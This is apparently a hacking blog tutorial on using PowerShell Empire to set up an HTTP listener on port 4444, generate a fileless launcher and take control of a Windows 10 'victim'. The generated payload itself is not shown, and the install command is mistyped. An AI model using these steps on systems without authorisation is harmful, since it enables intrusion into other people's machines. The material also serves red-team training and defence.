Even though the fileless malware scene isn’t new, it has got its desired attention just recently. With antivirus solutions adapting artificial intelligence and techniques like dynamic analysis, it became harder and harder for malware developers to maintain undetected payloads. Eventually, any sort of malicious file gets detected. But, what if the malicious payload has no file? That’s what PowerShell Empire is here for.
In this article we will introduce you to a rising form of attacks by teaching you how to load malicious code into memory via PowerShell Empire. But first of all, we need to know what PowerShell is: PowerShell is a powerful scripting language by Microsoft that was initially a tool for Windows system administrators to maintain their systems with ease in an automated manner. Later, PowerShell became the Bash of the Windows operating systems family.
Over time, people noticed that PowerShell can be used as well as a malware delivery vector and a post-exploitation vector. Hence tools like Nishang and PowerShell Empire were born.
Enough theory though, let’s get into practice. For this article we will be using the aforementioned PowerShell Empire on a Kali Linux machine (it should be pre-installed by default) and a Windows 10 target machine, which we will infect. You can get Kali Linux here. If Powershell Empire is not installed by default, run this command in the terminal:
sudo apt update && sudo apt get install powershell-empire
After acquiring everything we need, let’s run the PowerShell Empire:
After some loading, you will be greeted by something like this
This might remind you of the Metasploit Framework main screen. Actually, you will find that PowerShell Empire is actually really similar to the Metasploit Console.
As we can see, 298 modules are loaded, and there are no agents (clients) or listeners active. Let’s first fire up a listener. You can find available listeners by typing ‘uselistener ‘ (mind the space) and then hitting the tab twice:
The job PowerShell Empire has done on autocomplete is wonderful. Here we can see that one of the listeners is ‘http’, which is the one we are going to use. Do an ‘uselistener http’ and the listener will get loaded. Now we need to see the configurable options for your listener. Luckily, just like in Metasploit, you can see the options by simply typing ‘info’:
Fortunately, as we see, we won’t have to bother much with the settings. Even our local area network IP address is set automatically. All we have to do is set the port where the listener will run and start the listener. To do so, do the following:
set Port 4444
As you can see, we are telling the PowerShell Empire to listen on port 4444. Now we will have to generate our fileless malware. To do so, all we have to do is write the following command:
That’s it! We have a fileless malware launcher generated
Execute the generated payload in Windows command prompt, and you will see an agent pop up:
That’s it! We have full control over the target machine!
We can do a quick ‘sysinfo’ to see what our victim is.
That concludes our fileless malware adventures. If you found that useful, please leave a comment or consider sharing this post. Also, make sure to check out Privilege Escalation with PowerShell Empire! Good luck and happy hacking!